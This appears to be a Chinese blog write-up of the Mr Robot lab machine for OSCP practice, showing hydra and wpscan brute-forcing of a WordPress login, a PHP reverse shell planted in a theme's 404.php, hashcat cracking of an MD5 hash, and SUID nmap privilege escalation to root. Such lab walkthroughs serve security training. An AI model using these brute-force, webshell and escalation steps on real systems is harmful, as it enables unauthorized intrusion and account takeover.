OSCP(扩展篇靶机mrRobot)

第一步:nmap与dirb

 

 

 fsocity.dic这个可能是用户或者密码的字典,发现内部存在大量重复数据

 cat fsocity.dic | sort | uniq > fsocietyuniq

 进入登录界面test/test登录

 

第二步:使用hydra进行用户名密码暴力破解

Invalid username 不存在该用户名    F认证失败提示Invalid username,陈列出来的结果只有认证成功的

Hydra命令:
hydra -L user.txt -P password.txt -f http://example.com http-post-form "/login.php:user=^USER^&password=^PASS^:F=incorrect" -V
其中,-L选项指定用户名字典文件user.txt,-P选项指定口令字典文件password.txt,-f选项指定目标Web应用程序的URL,http-post-form指定使用http-post-form模板脚本,/login.php:user=^USER^&password=^PASS^指定POST请求参数,F=incorrect指定认证失败时的响应信息,-V选项指定显示详细信息。

hydra -L fsocietyuniq -p test 192.168.107.146 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

 得出用户名是elliot,后面需要用hydra暴力破解得出密码

 hydra暴力破解密码:()

hydra -l elliot -P fsocietyuniq 192.168.107.146 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

 [80][http-post-form] host: 192.168.107.146   login: elliot   password: ER28-0652

也可以使用wpscan:

wpscan -U Elliot -P fsocietyuniq --url http://192.168.107.146

 

成功登陆wp-admin

 

第三步:上传php :webshell

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://pentestmonkey.net/tools/web-shells/php-reverse-shell

 

我们就修改404.php吧

 

 update files;然后访问404.php页面

http://192.168.107.146/404.php

 

第五步:权限daemon提升到robot(hash线索)

python -c 'import pty; pty.spawn("/bin/bash")'

 

 得到robot类似hash的线索

robot:c3fcd3d76192e4007dfb496cca67e13b

vi hash

gunzip /usr/share/wordlists/rockyou.txt.gz

hashcat -a 0 -m 0 hash  /usr/share/wordlists/rockyou.txt --force

hashcat用法:https://xz.aliyun.com/t/4008

复制代码
-a  指定要使用的破解模式,其值参考后面对参数。“-a 0”字典攻击,“-a 1” 组合攻击;“-a 3”掩码攻击。
-m  指定要破解的hash类型,如果不指定类型,则默认是MD5
-o  指定破解成功后的hash及所对应的明文密码的存放位置,可以用它把破解成功的hash写到指定的文件中
--force 忽略破解过程中的警告信息,跑单条hash可能需要加上此选项
--show  显示已经破解的hash及该hash所对应的明文
--increment  启用增量破解模式,你可以利用此模式让hashcat在指定的密码长度范围内执行破解过程
--increment-min  密码最小长度,后面直接等于一个整数即可,配置increment模式一起使用
--increment-max  密码最大长度,同上
--outfile-format 指定破解结果的输出格式id,默认是3
--username   忽略hash文件中的指定的用户名,在破解linux系统用户密码hash可能会用到
--remove     删除已被破解成功的hash
-r       使用自定义破解规则
# | Mode
 ===+======
  0 | Straight(字段破解)
  1 | Combination(组合破解)
  3 | Brute-force(掩码暴力破解)
  6 | Hybrid Wordlist + Mask(字典+掩码破解)
  7 | Hybrid Mask + Wordlist(掩码+字典破解)
复制代码

 暴力破解时需要把内存调高

 得出密码为:abcdefghijklmnopqrstuvwxyz,登陆成功

 

第六步:权限提升,从robot到root

find / -perm -4000 -type f   查找该用户权限线索

 利用配置错误的二进制文件:https://gtfobins.github.io/

其中/usr/local/bin/nmap就是其中一个权限提升的例子

 最终获取到root权限

 最终获取到root旗帜

 

完结撒花~

 
posted @   justdoIT*  阅读(23)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示